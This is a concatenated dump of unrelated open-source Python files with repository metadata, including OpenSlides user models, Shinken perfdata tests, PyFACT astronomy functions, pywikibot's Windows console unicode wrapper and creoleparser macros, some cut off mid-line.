<Content xmlns="http://messenger.msn.com/ws/2004/09/oim/">
%s
</Content>""" % (message_type, message_content)
def process_response(soap_response):
return True
|
jwinzer/OpenSlides
|
server/openslides/users/models.py
|
Python
|
mit
| 12,597
| 0.001111
|
import smtplib
from decimal import Decimal
from django.conf import settings
from django.contrib.auth.hashers import make_password
from django.contrib.auth.models import (
AbstractBaseUser,
BaseUserManager,
Group as DjangoGroup,
GroupManager as _GroupManager,
Permission,
PermissionsMixin,
)
from django.core import mail
from django.core.exceptions import ObjectDoesNotExist, ValidationError
from django.db import models
from django.db.models import Prefetch
from django.utils import timezone
from jsonfield import JSONField
from openslides.utils.manager import BaseManager
from ..core.config import config
from ..utils.auth import GROUP_ADMIN_PK
from ..utils.autoupdate import inform_changed_data
from ..utils.models import (
CASCADE_AND_AUTOUPDATE,
SET_NULL_AND_AUTOUPDATE,
RESTModelMixin,
)
from .access_permissions import (
GroupAccessPermissions,
PersonalNoteAccessPermissions,
UserAccessPermissions,
)
class UserManager(BaseUserManager):
"""
Customized manager that creates new users only with a password and a
username. It also supports our get_prefetched_queryset method.
"""
def get_prefetched_queryset(self, ids=None):
"""
Returns the normal queryset with all users. In the background all
groups are prefetched from the database together with all permissions
and content types.
"""
queryset = self.get_queryset()
if ids:
queryset = queryset.filter(pk__in=ids)
return queryset.prefetch_related(
Prefetch(
"groups",
queryset=Group.objects.select_related("group_ptr").prefetch_related(
Prefetch(
"permissions",
queryset=Permission.objects.select_related("content_type"),
)
),
),
"vote_delegated_from_users",
)
def create_user(self, username, password, skip_autoupdate=False, **kwargs):
"""
Creates a new user only with a password and a username.
"""
user = self.model(username=username, **kwargs)
user.set_password(password)
user.save(skip_autoupdate=skip_autoupdate, using=self._db)
return user
def create_or_reset_admin_user(self, skip_autoupdate=False):
"""
Creates an user with the username 'admin'. If such a user already
exists, resets it. The password is (re)set to 'admin'. The user
becomes member of the group 'Admin'.
"""
created = False
try:
admin = self.get(username="admin")
except ObjectDoesNotExist:
admin = self.model(username="admin", last_name="Administrator")
created = True
admin.default_password = "admin"
admin.password = make_password(admin.default_password)
admin.save(skip_autoupdate=skip_autoupdate)
admin.groups.add(GROUP_ADMIN_PK)
if not skip_autoupdate:
inform_changed_data(admin)
return created
def generate_username(self, first_name, last_name):
"""
Generates a username from first name and last name.
"""
first_name = first_name.strip()
last_name = last_name.strip()
if first_name and last_name:
base_name = " ".join((first_name, last_name))
else:
base_name = first_name or last_name
if not base_name:
raise ValueError(
"Either 'first_name' or 'last_name' must not be empty."
)
if not self.filter(username=base_name).exists():
generated_username = base_name
else:
counter = 0
while True:
counter += 1
test_name = f"{base_name} {counter}"
if not self.filter(username=test_name).exists():
generated_username = test_name
break
return generated_username
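# Standalone sketch of the collision loop above, with the database lookup
# replaced by set membership (names are hypothetical illustration only):
def _demo_generate_username(base_name, taken):
    if base_name not in taken:
        return base_name
    counter = 0
    while True:
        counter += 1
        test_name = f"{base_name} {counter}"
        if test_name not in taken:
            return test_name

assert _demo_generate_username("Jane Doe", {"Jane Doe", "Jane Doe 1"}) == "Jane Doe 2"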
class User(RESTModelMixin, PermissionsMixin, AbstractBaseUser):
"""
Model for users in OpenSlides. A client can login as an user with
credentials. An user can also just be used as representation for a person
in other OpenSlides apps like motion submitter or (assignment) election
candidates.
"""
access_permissions = UserAccessPermissions()
USERNAME_FIELD = "username"
username = models.CharField(max_length=255, unique=True, blank=True)
auth_type = models.CharField(max_length=64, default="default")
first_name = models.CharField(max_length=255, blank=True)
last_name = models.CharField(max_length=255, blank=True)
gender = models.CharField(max_length=255, blank=True)
email = models.EmailField(blank=True)
last_email_send = models.DateTimeField(blank=True, null=True)
# TODO: Try to remove the default argument in the following fields.
structure_level = models.CharField(max_length=255, blank=True, default="")
title = models.CharField(max_length=50, blank=True, default="")
number = models.CharField(max_length=50, blank=True, default="")
about_me = models.TextField(blank=True, default="")
comment = models.TextField(blank=True, default="")
default_password = models.CharField(max_length=100, blank=True, default="")
is_active = models.BooleanField(default=True)
is_present = models.BooleanField(default=False)
is_committee = models.BooleanField(default=False)
vote_weight = models.DecimalField(
default=Decimal("1"), max_digits=15, decimal_places=6, null=False, blank=True
)
vote_delegated_to = models.ForeignKey(
"self",
on_delete=SET_NULL_AND_AUTOUPDATE,
null=True,
blank=True,
related_name="vote_delegated_from_users",
)
objects = UserManager()
class Meta:
default_permissions = ()
permissions = (
("can_see_name", "Can see names of users"),
(
"can_see_extra_data",
"Can see extra data of users (e.g. email and comment)",
),
("can_change_password", "Can change its own password"),
("can_manage", "Can manage users"),
)
ordering = ("last_name", "first_name", "username")
def __str__(self):
# Strip white spaces from the name parts
first_name = self.first_name.strip()
last_name = self.last_name.strip()
# The user has a last_name and a first_name
if first_name and last_name:
name = " ".join((self.first_name, self.last_name))
# The user has only a first_name or a last_name or no name
else:
name = first_name or last_name or self.username
# Return result
return name
def save(self, *args, **kwargs):
"""
Overridden method to skip autoupdate if only last_login field was
updated as it is done during login.
"""
if kwargs.get("update_fields") == ["last_login"]:
kwargs["skip_autoupdate"] = True
return super().save(*args, **kwargs)
def has_perm(self, perm):
"""
This method is closed. Do not use it but use openslides.utils.auth.has_perm.
"""
raise RuntimeError(
"Do not use user.has_perm() but use openslides.utils.auth.has_perm"
)
def send_invitation_email(
self, connection, subject, message, skip_autoupdate=False
):
"""
Sends an invitation email to the user. Returns True on success, False on failure.
May raise a ValidationError if something goes wrong.
"""
if not self.email:
return False
# Custom dict class that for formatstrings with entries like {not_existent}
# no error is raised and this is replaced with ''.
class format_dict(dict):
def __missing__(self, key):
return ""
message_format = format_dict(
{
"name": str(self),
"event_name": config["general_event_name"],
"url": c
|
jeremiah-c-leary/vhdl-style-guide
|
vsg/rules/signal/rule_008.py
|
Python
|
gpl-3.0
| 705
| 0.001418
|
from vsg.rules import token_prefix
from vsg import token
lTokens = []
lTokens.append(token.signal_declaration.identifier)
class rule_008(token_prefix):
'''
This rule checks for valid prefixes on signal identifiers.
Default signal prefix is *s\_*.
|configuring_prefix_and_suffix_rules_link|
**Violation**
.. code-block:: vhdl
signal wr_en : std_logic;
signal rd_en : std_logic;
**Fix**
.. code-block:: vhdl
signal s_wr_en : std_logic;
signal s_rd_en : std_logic;
'''
def __init__(self):
token_prefix.__init__(self, 'signal', '008', lTokens)
self.prefixes = ['s_']
self.solution = 'Signal identifiers'
|
xorpaul/shinken
|
test/test_parse_perfdata.py
|
Python
|
agpl-3.0
| 4,222
| 0.002842
|
#!/usr/bin/env python
# Copyright (C) 2009-2010:
# Gabes Jean, naparuba@gmail.com
# Gerhard Lausser, Gerhard.Lausser@consol.de
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
#
# This file is used to test reading and processing of config files
#
from shinken_test import *
from shinken.misc.perfdata import Metric, PerfDatas
class TestParsePerfdata(ShinkenTest):
# Uncomment this if you want to use a specific configuration
# for your test
#def setUp(self):
# self.setup_with_file('etc/nagios_parse_perfdata.cfg')
def test_parsing_perfdata(self):
s = 'ramused=1009MB;;;0;1982 swapused=540MB;;;0;3827 memused=1550MB;2973;3964;0;5810'
s = 'ramused=1009MB;;;0;1982'
m = Metric(s)
self.assert_(m.name == 'ramused')
self.assert_(m.value == 1009)
self.assert_(m.uom == 'MB')
self.assert_(m.warning == None)
self.assert_(m.critical == None)
self.assert_(m.min == 0)
self.assert_(m.max == 1982)
s = 'ramused=90%;85;95;;'
m = Metric(s)
self.assert_(m.name == 'ramused')
self.assert_(m.value == 90)
self.assert_(m.uom == '%')
self.assert_(m.warning == 85)
self.assert_(m.critical == 95)
self.assert_(m.min == 0)
self.assert_(m.max == 100)
s = 'ramused=1009MB;;;0;1982 swapused=540MB;;;; memused=90%'
p = PerfDatas(s)
p.metrics
m = p['swapused']
self.assert_(m.name == 'swapused')
self.assert_(m.value == 540)
self.assert_(m.uom == 'MB')
self.assert_(m.warning == None)
self.assert_(m.critical == None)
self.assert_(m.min == None)
self.assert_(m.max == None)
m = p['memused']
self.assert_(m.name == 'memused')
self.assert_(m.value == 90)
self.assert_(m.uom == '%')
self.assert_(m.warning == None)
self.assert_(m.critical == None)
self.assert_(m.min == 0)
self.assert_(m.max == 100)
self.assert_(len(p) == 3)
s = "'Physical Memory Used'=12085620736Bytes; 'Physical Memory Utilisation'=94%;80;90;"
p = PerfDatas(s)
p.metrics
m = p['Physical Memory Used']
self.assert_(m.name == 'Physical Memory Used')
self.assert_(m.value == 12085620736)
self.assert_(m.uom == 'Bytes')
self.assert_(m.warning is None)
self.assert_(m.critical is None)
self.assert_(m.min is None)
self.assert_(m.max is None)
m = p['Physical Memory Utilisation']
self.assert_(m.name == 'Physical Memory Utilisation')
self.assert_(m.value == 94)
self.assert_(m.uom == '%')
self.assert_(m.warning == 80)
self.assert_(m.critical == 90)
self.assert_(m.min == 0)
self.assert_(m.max == 100)
s = "'C: Space'=35.07GB; 'C: Utilisation'=87.7%;90;95;"
p = PerfDatas(s)
p.metrics
m = p['C: Space']
self.assert_(m.name == 'C: Space')
self.assert_(m.value == 35.07)
self.assert_(m.uom == 'GB')
self.assert_(m.warning is None)
self.assert_(m.critical is None)
self.assert_(m.min is None)
self.assert_(m.max is None)
m = p['C: Utilisation']
self.assert_(m.name == 'C: Utilisation')
self.assert_(m.value == 87.7)
self.assert_(m.uom == '%')
self.assert_(m.warning == 90)
self.assert_(m.critical == 95)
self.assert_(m.min == 0)
self.assert_(m.max == 100)
if __name__ == '__main__':
unittest.main()
|
mraue/pyfact
|
pyfact/map.py
|
Python
|
bsd-3-clause
| 11,616
| 0.008351
|
#===========================================================================
# Copyright (c) 2011-2012, the PyFACT developers
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the PyFACT developers nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE PYFACT DEVELOPERS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#===========================================================================
# Imports
import sys, time, logging, os, datetime, math
import numpy as np
import scipy.optimize
import scipy.special
import scipy.ndimage
import pyfits
import pyfact as pf
#===========================================================================
# Functions & classes
#---------------------------------------------------------------------------
class SkyCoord:
"""Sky coordinate in RA and Dec. All units should be degree."""
def __init__(self, ra, dec) :
"""
Sky coordinate in RA and Dec. All units should be degree.
In the current implementation it should also work with arrays, though one has to be careful in dist.
Parameters
----------
ra : float/array
Right ascension of the coordinate.
dec : float/array
Declination of the coordinate.
"""
self.ra, self.dec = ra, dec
def dist(self, c) :
"""
Return the distance of the coordinates in degree following the haversine formula,
see e.g. http://en.wikipedia.org/wiki/Great-circle_distance.
Parameters
----------
c : SkyCoord
Returns
-------
distance : float
Return the distance of the coordinates in degree following the haversine formula.
Notes
-----
http://en.wikipedia.org/wiki/Great-circle_distance
"""
return 2. * np.arcsin(np.sqrt(np.sin((self.dec - c.dec) / 360. * np.pi) ** 2.
+ np.cos(self.dec / 180. * np.pi) * np.cos(c.dec / 180. * np.pi)\
* np.sin((self.ra - c.ra) / 360. * np.pi) ** 2.)) / np.pi * 180.
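# Sanity-check sketch for dist(), added for illustration: two points one
# degree apart in RA on the equator should be ~1 degree apart.
assert abs(SkyCoord(0., 0.).dist(SkyCoord(1., 0.)) - 1.) < 1e-6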
#---------------------------------------------------------------------------
class SkyCircle:
"""A circle on the sky."""
def __init__(self, c, r) :
"""
A circle on the sky.
Parameters
----------
coord : SkyCoord
Coordinates of the circle center (RA, Dec)
r : float
Radius of the circle (deg).
"""
self.c, self.r = c, r
def contains(self, c) :
"""
Checks if the coordinate lies inside the circle.
Parameters
----------
c : SkyCoord
Returns
-------
contains : bool
True if c lies in the SkyCircle.
"""
return self.c.dist(c) <= self.r
def intersects(self, sc) :
"""
Checks if two sky circles overlap.
Parameters
----------
sc : SkyCircle
"""
return self.c.dist(sc.c) <= self.r + sc.r
#---------------------------------------------------------------------------
def skycircle_from_str(cstr) :
"""Creates SkyCircle from circle region string."""
x, y, r = eval(cstr.upper().replace('CIRCLE', ''))
return SkyCircle(SkyCoord(x, y), r)
#---------------------------------------------------------------------------
def get_cam_acc(camdist, rmax=4., nbins=None, exreg=None, fit=False, fitfunc=None, p0=None) :
"""
Calculates the camera acceptance histogram from a given list with camera distances (event list).
Parameters
----------
camdist : array
Numpy array of camera distances (event list).
rmax : float, optional
Maximum radius for the acceptance histogram.
nbins : int, optional
Number of bins for the acceptance histogram (default = 0.1 deg).
exreg : array, optional
Array of exclusion regions. Exclusion regions are given by an aray of size 2
[r, d] with r = radius, d = distance to camera center
fit : bool, optional
Fit acceptance histogram (default=False).
"""
if not nbins :
nbins = int(rmax / .1)
# Create camera distance histogram
n, bins = np.histogram(camdist, bins=nbins, range=[0., rmax])
nerr = np.sqrt(n)
# Bin center array
r = (bins[1:] + bins[:-1]) / 2.
# Bin area (ring) array
r_a = (bins[1:] ** 2. - bins[:-1] ** 2.) * np.pi
# Deal with exclusion regions
ex_a = None
if exreg :
ex_a = np.zeros(len(r))
t = np.ones(len(r))
for reg in exreg :
ex_a += (pf.circle_circle_intersection_a(bins[1:], t * reg[0], t * reg[1])
- pf.circle_circle_intersection_a(bins[:-1], t * reg[0], t * reg[1]))
ex_a /= r_a
# Fit the data
fitter = None
if fit :
#fitfunc = lambda p, x: p[0] * x ** p[1] * (1. + (x / p[2]) ** p[3]) ** ((p[1] + p[4]) / p[3])
if not fitfunc :
fitfunc = lambda p, x: p[0] * x ** 0. * (1. + (x / p[1]) ** p[2]) ** ((0. + p[3]) / p[2])
#fitfunc = lambda p, x: p[0] * x ** 0. * (1. + (x / p[1]) ** p[2]) ** ((0. + p[3]) / p[2]) + p[4] / (np.exp(p[5] * (x - p[6])) + 1.)
if not p0 :
p0 = [n[0] / r_a[0], 1.5, 3., -5.] # Initial guess for the parameters
#p0 = [.5 * n[0] / r_a[0], 1.5, 3., -5., .5 * n[0] / r_a[0], 100., .5] # Initial guess for the parameters
fitter = pf.ChisquareFitter(fitfunc)
m = (n > 0.) * (nerr > 0.) * (r_a != 0.) * ((1. - ex_a) != 0.)
if np.sum(m) <= len(p0) :
logging.error('Could not fit camera acceptance (dof={0}, bins={1})'.format(len(p0), np.sum(m)))
else :
# ok, this _should_ be improved !!!
x, y, yerr = r[m], n[m] / r_a[m] / (1. - ex_a[m]) , nerr[m] / r_a[m] / (1. - ex_a[m])
m = np.isfinite(x) * np.isfinite(y) * np.isfinite(yerr) * (yerr != 0.)
if np.sum(m) <= len(p0) :
logging.error('Could not fit camera acceptance (dof={0}, bins={1})'.format(len(p0), np.sum(m)))
else :
fitter.fit_data(p0, x[m], y[m], yerr[m])
return (n, bins, nerr, r, r_a, ex_a, fitter)
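#---------------------------------------------------------------------------
# Editor's sketch: a hypothetical call of get_cam_acc on fake data. With no
# exclusion regions and fit=False, neither the `pf` helpers nor the fitter
# are touched, so this runs with numpy alone.
def _cam_acc_example():
    camdist = np.sqrt(np.random.uniform(0., 16., 10000))  # fake offsets (deg)
    n, bins, nerr, r, r_a, ex_a, fitter = get_cam_acc(camdist, rmax=4.)
    return r, n / r_a  # radial bin centers and per-area event density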
#---------------------------------------------------------------------------
def get_sky_mask_circle(r, bin_size) :
"""
Returns a 2d numpy histogram with (2. * r / bin_size) bins per axis
    where a circle of radius r has bins filled with 1s; all other bins are 0.
Parameters
----------
r : float
Radius of the circle.
bin_size : float
        Physical size of the bin, same units as r.
Returns
-------
sky_mask : 2d numpy array
Returns a 2d numpy histogram with (2. * r / bin_size) bins per axis
        where a circle of radius r has bins filled with 1s; all other bins are 0.
scampion/pimpy | pimpy/video/features/surf.py | Python | agpl-3.0 | 2,428 | 0.011532
"""
pimpy.video.features.surf : enables computing a video signature
.. module:: surf
:synopsis: Tools for video
:platform: Unix, Mac, Windows
.. moduleauthor:: Sebastien Campion <sebastien.campion@inria.fr>
"""
# pimpy
# Copyright (C) 2010 Sebastien Campion <sebastien.campion@inria.fr>
#
# pimpy is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# pimpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pimpy; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
from feature import Feature
import numpy,logging
from pimpy.video.decoder import decoder
class Surf(Feature):
u"""
    SURF descriptors provided by OpenCV
    :param sigsize: input signature size, default 64
    :type sigsize: int
"""
log = logging.getLogger('pimpy.video.features.surf')
description = __doc__
def __init__(self,**kwargs):
u"""
        compute video signature based on SURF descriptors
"""
Feature.__init__(self,**kwargs)
def _callback(self,frame):
k,d = frame.get_feature("surf")
self.avfs["keypoints"].write(k)
self.avfs["vectors"].write(d)
def get(self,video):
"""
return array of [keypoints,descriptors] for each video frame
:rtype: numpy.array
"""
self.avfs = video.hdf5.get_avfeature_set("visual",self.name)
if not self.avfs :
desc_dataset = (("keypoints",6,numpy.float),
("vectors",64,numpy.float))
self.avfs = video.hdf5.create_avfeature_set("visual",
self.name,
desc_dataset)
d = decoder(video)
d.decode_qcif_gray(self._callback)
print self.avfs.keys()
return (self.avfs['keypoints'].read(),
self.avfs['vectors'].read())
wintermind/pypedal | PyPedal/examples/new_graphics3.py | Python | gpl-2.0 | 1,123 | 0.007124
#!/usr/bin/python
###############################################################################
# NAME: new_graphics3.py
# VERSION: 2.0.0b15 (18SEPTEMBER2006)
# AUTHOR: John B. Cole, PhD (jcole@aipl.arsusda.gov)
# LICENSE: LGPL
###############################################################################
from PyPedal import pyp_demog
from PyPedal import pyp_graphics
from PyPedal import pyp_jbc
from PyPedal import pyp_newclasses
from PyPedal import pyp_nrm
from PyPedal import pyp_metrics
from PyPedal.pyp_utils import pyp_nice_time
if __name__ == '__main__':
print 'Starting pypedal.py at %s' % (pyp_nice_time())
example = pyp_newclasses.loadPedigree(optionsfile='new_graphics3.ini')
if example.kw['messages'] == 'verbose':
print '[INFO]: Calling pyp_graphics.new_draw_pedigree() at %s' % (pyp_nice_time())
pyp_graphics.new_draw_pedigree(example, gfilename='graphics3', gtitle='graphics3 pedigree', gorient='p')
pyp_jbc.color_pedigree(example,gfilename='graphics3', ghatch='0', \
metric='sons', gtitle='Nodes are colored by number of sons.', \
gprog='dot', gname=1)
davrv93/creed-en-sus-profetas-backend | django_rv_apps/apps/believe_his_prophets_api/views/spirit_prophecy_chapter_language/filters.py | Python | apache-2.0 | 1,155 | 0.013853
import django_filters
from django_filters import rest_framework as filters
from django_rv_apps.apps.believe_his_prophets.models.spirit_prophecy_chapter import SpiritProphecyChapter, SpiritProphecyChapterLanguage
from django_rv_apps.apps.believe_his_prophets.models.spirit_prophecy import SpiritProphecy
from django_rv_apps.apps.believe_his_prophets.models.language import Language
from django.utils import timezone
class SpiritProphecyChapterLanguageFilter(django_filters.FilterSet):
    code_iso = filters.ModelMultipleChoiceFilter(
queryset=Language.objects.all(),
field_name='language__code_iso',
to_field_name='code_iso'
)
start_date = filters.CharFilter(method='filter_date')
class Meta:
model = SpiritProphecyChapterLanguage
        fields = ('id', 'code_iso', 'start_date')
def filter_date(self, queryset, name, value):
t = timezone.localtime(timezone.now())
return queryset.filter(
spirit_prophecy_chapter__start_date__year = t.year,
spirit_prophecy_chapter__start_date__month = t.month, spirit_prophecy_chapter__start_date__day = t.day,
)
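# Editor's sketch: hypothetical use of the filter above from a shell; the
# request parameters are made up. Note that filter_date ignores the submitted
# value and always restricts to chapters starting today.
# f = SpiritProphecyChapterLanguageFilter(
#     {'code_iso': ['en'], 'start_date': '1'},
#     queryset=SpiritProphecyChapterLanguage.objects.all())
# f.qs  # English chapters whose start_date is today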
icyflame/batman | pywikibot/userinterfaces/win32_unicode.py | Python | mit | 12,438 | 0.001769
# -*- coding: utf-8 -*-
"""Stdout, stderr and argv support for unicode."""
##############################################
# Support for unicode in windows cmd.exe
# Posted on Stack Overflow [1], available under CC-BY-SA 3.0 [2]
#
# Question: "Windows cmd encoding change causes Python crash" [3] by Alex [4],
# Answered [5] by David-Sarah Hopwood [6].
#
# [1] https://stackoverflow.com
# [2] https://creativecommons.org/licenses/by-sa/3.0/
# [3] https://stackoverflow.com/questions/878972
# [4] https://stackoverflow.com/users/85185
# [5] https://stackoverflow.com/a/3259271/118671
# [6] https://stackoverflow.com/users/393146
#
################################################
#
# stdin support added by Merlijn van Deen <valhallasw@gmail.com>, March 2012
# Licensed under both CC-BY-SA and the MIT license.
#
################################################
from __future__ import absolute_import, print_function, unicode_literals
from io import UnsupportedOperation
import sys
stdin = sys.stdin
stdout = sys.stdout
stderr = sys.stderr
argv = sys.argv
if sys.version_info[0] > 2:
unicode = str
PY3 = True
else:
PY3 = False
if sys.platform == "win32":
import codecs
from ctypes import WINFUNCTYPE, windll, POINTER
from ctypes import byref, c_int, create_unicode_buffer
from ctypes.wintypes import BOOL, HANDLE, DWORD, LPWSTR, LPCWSTR
try:
from ctypes.wintypes import LPVOID
except ImportError:
from ctypes import c_void_p as LPVOID
original_stderr = sys.stderr
# If any exception occurs in this code, we'll probably try to print it on stderr,
# which makes for frustrating debugging if stderr is directed to our wrapper.
# So be paranoid about catching errors and reporting them to original_stderr,
# so that we can at least see them.
def _complain(message):
print(isinstance(message, str) and message or repr(message), file=original_stderr)
# Work around <http://bugs.python.org/issue6058>.
codecs.register(lambda name: name == 'cp65001' and codecs.lookup('utf-8') or None)
# Make Unicode console output work independently of the current code page.
# This also fixes <http://bugs.python.org/issue1602>.
# Credit to Michael Kaplan <http://blogs.msdn.com/b/michkap/archive/2010/04/07/9989346.aspx>
# and TZOmegaTZIOY
# <https://stackoverflow.com/questions/878972/windows-cmd-encoding-change-causes-python-crash/1432462#1432462>.
try:
# <https://msdn.microsoft.com/en-us/library/ms683231(VS.85).aspx>
# HANDLE WINAPI GetStdHandle(DWORD nStdHandle);
# returns INVALID_HANDLE_VALUE, NULL, or a valid handle
#
# <https://msdn.microsoft.com/en-us/library/aa364960(VS.85).aspx>
# DWORD WINAPI GetFileType(DWORD hFile);
#
# <https://msdn.microsoft.com/en-us/library/ms683167(VS.85).aspx>
# BOOL WINAPI GetConsoleMode(HANDLE hConsole, LPDWORD lpMode);
GetStdHandle = WINFUNCTYPE(HANDLE, DWORD)(("GetStdHandle", windll.kernel32))
STD_INPUT_HANDLE = DWORD(-10)
STD_OUTPUT_HANDLE = DWORD(-11)
STD_ERROR_HANDLE = DWORD(-12)
GetFileType = WINFUNCTYPE(DWORD, DWORD)(("GetFileType", windll.kernel32))
FILE_TYPE_CHAR = 0x0002
FILE_TYPE_REMOTE = 0x8000
GetConsoleMode = (WINFUNCTYPE(BOOL, HANDLE, POINTER(DWORD))
(("GetConsoleMode", windll.kernel32)))
INVALID_HANDLE_VALUE = DWORD(-1).value
def not_a_console(handle):
"""Return whether the handle is not to a console."""
            if handle == INVALID_HANDLE_VALUE or handle is None:
return True
return ((GetFileType(handle) & ~FILE_TYPE_REMOTE) != FILE_TYPE_CHAR or
GetConsoleMode(handle, byref(DWORD())) == 0)
def old_fileno(std_name):
"""Return the fileno or None if that doesn't work."""
# some environments like IDLE don't support the fileno operation
# handle those like std streams which don't have fileno at all
        std = getattr(sys, 'std{0}'.format(std_name))
if hasattr(std, 'fileno'):
try:
return std.fileno()
except UnsupportedOperation:
pass
old_stdin_fileno = old_fileno('in')
old_stdout_fileno = old_fileno('out')
old_stderr_fileno = old_fileno('err')
STDIN_FILENO = 0
STDOUT_FILENO = 1
STDERR_FILENO = 2
real_stdin = (old_stdin_fileno == STDIN_FILENO)
real_stdout = (old_stdout_fileno == STDOUT_FILENO)
real_stderr = (old_stderr_fileno == STDERR_FILENO)
if real_stdin:
hStdin = GetStdHandle(STD_INPUT_HANDLE)
if not_a_console(hStdin):
real_stdin = False
if real_stdout:
hStdout = GetStdHandle(STD_OUTPUT_HANDLE)
if not_a_console(hStdout):
real_stdout = False
if real_stderr:
hStderr = GetStdHandle(STD_ERROR_HANDLE)
if not_a_console(hStderr):
real_stderr = False
if real_stdin:
ReadConsoleW = WINFUNCTYPE(BOOL, HANDLE, LPVOID, DWORD, POINTER(DWORD),
LPVOID)(("ReadConsoleW", windll.kernel32))
class UnicodeInput:
"""Unicode terminal input class."""
def __init__(self, hConsole, name, bufsize=1024):
"""Initialize the input stream."""
self._hConsole = hConsole
self.bufsize = bufsize
self.buffer = create_unicode_buffer(bufsize)
self.name = name
self.encoding = 'utf-8'
def readline(self):
"""Read one line from the input."""
maxnum = DWORD(self.bufsize - 1)
numrecv = DWORD(0)
result = ReadConsoleW(self._hConsole, self.buffer, maxnum, byref(numrecv), None)
if not result:
raise Exception("stdin failure")
data = self.buffer.value[:numrecv.value]
if not PY3:
return data.encode(self.encoding)
else:
return data
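        # Editor's sketch (hypothetical wiring, not from this excerpt): a
        # caller could route console input through this wrapper with
        #   sys.stdin = UnicodeInput(hStdin, name='<Unicode console stdin>')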
if real_stdout or real_stderr:
# BOOL WINAPI WriteConsoleW(HANDLE hOutput, LPWSTR lpBuffer, DWORD nChars,
# LPDWORD lpCharsWritten, LPVOID lpReserved);
WriteConsoleW = WINFUNCTYPE(BOOL, HANDLE, LPWSTR, DWORD, POINTER(DWORD),
LPVOID)(("WriteConsoleW", windll.kernel32))
class UnicodeOutput:
"""Unicode terminal output class."""
def __init__(self, hConsole, stream, fileno, name):
"""Initialize the output stream."""
self._hConsole = hConsole
self._stream = stream
self._fileno = fileno
self.closed = False
self.softspace = False
self.mode = 'w'
self.encoding = 'utf-8'
self.name = name
self.flush()
def isatty(self):
"""Return whether it's a tty."""
return False
def close(self):
"""Set the stream to be closed."""
# don't really close the handle, that would only cause problems
self.closed = True
def fileno(self):
"""Return the fileno."""
return self._fileno
def flush(self):
"""Flush the stream."""
if self._hConsole is None:
try:
self._stream.flush()
except Exception as e:
_complain("%s.flush: %r from %r"
% (self.name, e, self._stream))
                        raise
hprid/creoleparser | creoleparser/test_cheat_sheet_plus.py | Python | mit | 2,923 | 0.021895
"""The macros below aren't reliable (e.g., some fail if ``arg_string`` is `None`)
or safe (``include`` doesn't guard against circular reference). For a more complete example, see
`the code used in the sandbox <http://code.google.com/p/urlminer/source/browse/examples/wiki/macros.py>`_.
"""
import genshi.builder as bldr
import dialects, core
import os
class Page(object):
root = 'test_pages'
def __init__(self,page_name):
self.name = page_name
def get_raw_body(self):
try:
f = open(os.path.join(self.root,self.name + '.txt'),'r')
s = f.read()
f.close()
return s
except IOError:
return None
def exists(self):
try:
f = open(os.path.join(self.root,self.name + '.txt'),'r')
f.close()
return True
except IOError:
return False
def class_func(page_name):
if not Page(page_name).exists():
return 'nonexistent'
def path_func(page_name):
if page_name == 'Home':
return 'FrontPage'
else:
return page_name
## Start of macros
def include(arg_string,body,isblock):
page = Page(arg_string.strip())
return text2html.generate(page.get_raw_body())
def include_raw(arg_string,body,isblock):
page = Page(arg_string.strip())
return bldr.tag.pre(page.get_raw_body(),class_='plain')
def include_source(arg_string,body,isblock):
page = Page(arg_string.strip())
return bldr.tag.pre(text2html.render(page.get_raw_body()))
def source(arg_string,body,isblock):
return bldr.tag.pre(text2html.render(body))
def pre(arg_string,body,isblock):
return bldr.tag.pre(body)
## End of macros
macros = {'include':include,
'include-raw':include_raw,
'include-source':include_source,
'source':source,
'pre':pre
}
def macro_dispatcher(macro_name,arg_string,body,isblock,environ):
if macro_name in macros:
return macros[macro_name](arg_string,body,isblock)
dialect = dialects.create_dialect(dialects.creole11_base,
wiki_links_base_url='',
wiki_links_space_char='',
# use_additions=True,
no_wiki_monospace=False,
wiki_links_class_func=class_func,
wiki_links_path_func=path_func,
macro_func=macro_dispatcher)
text2html = core.Parser(dialect)
if __name__ == '__main__':
text = Page('CheatSheetPlus').get_raw_body()
f = open(os.path.join('test_pages','CheatSheetPlus.html'),'r')
rendered = f.read()
f.close()
f = open(os.path.join('test_pages','template.html'),'r')
template = f.read()
f.close()
out = open(os.path.join('test_pages','out.html'),'w')
out.write(template % text2html(text))
out.close()
assert template % text2html(text) == rendered
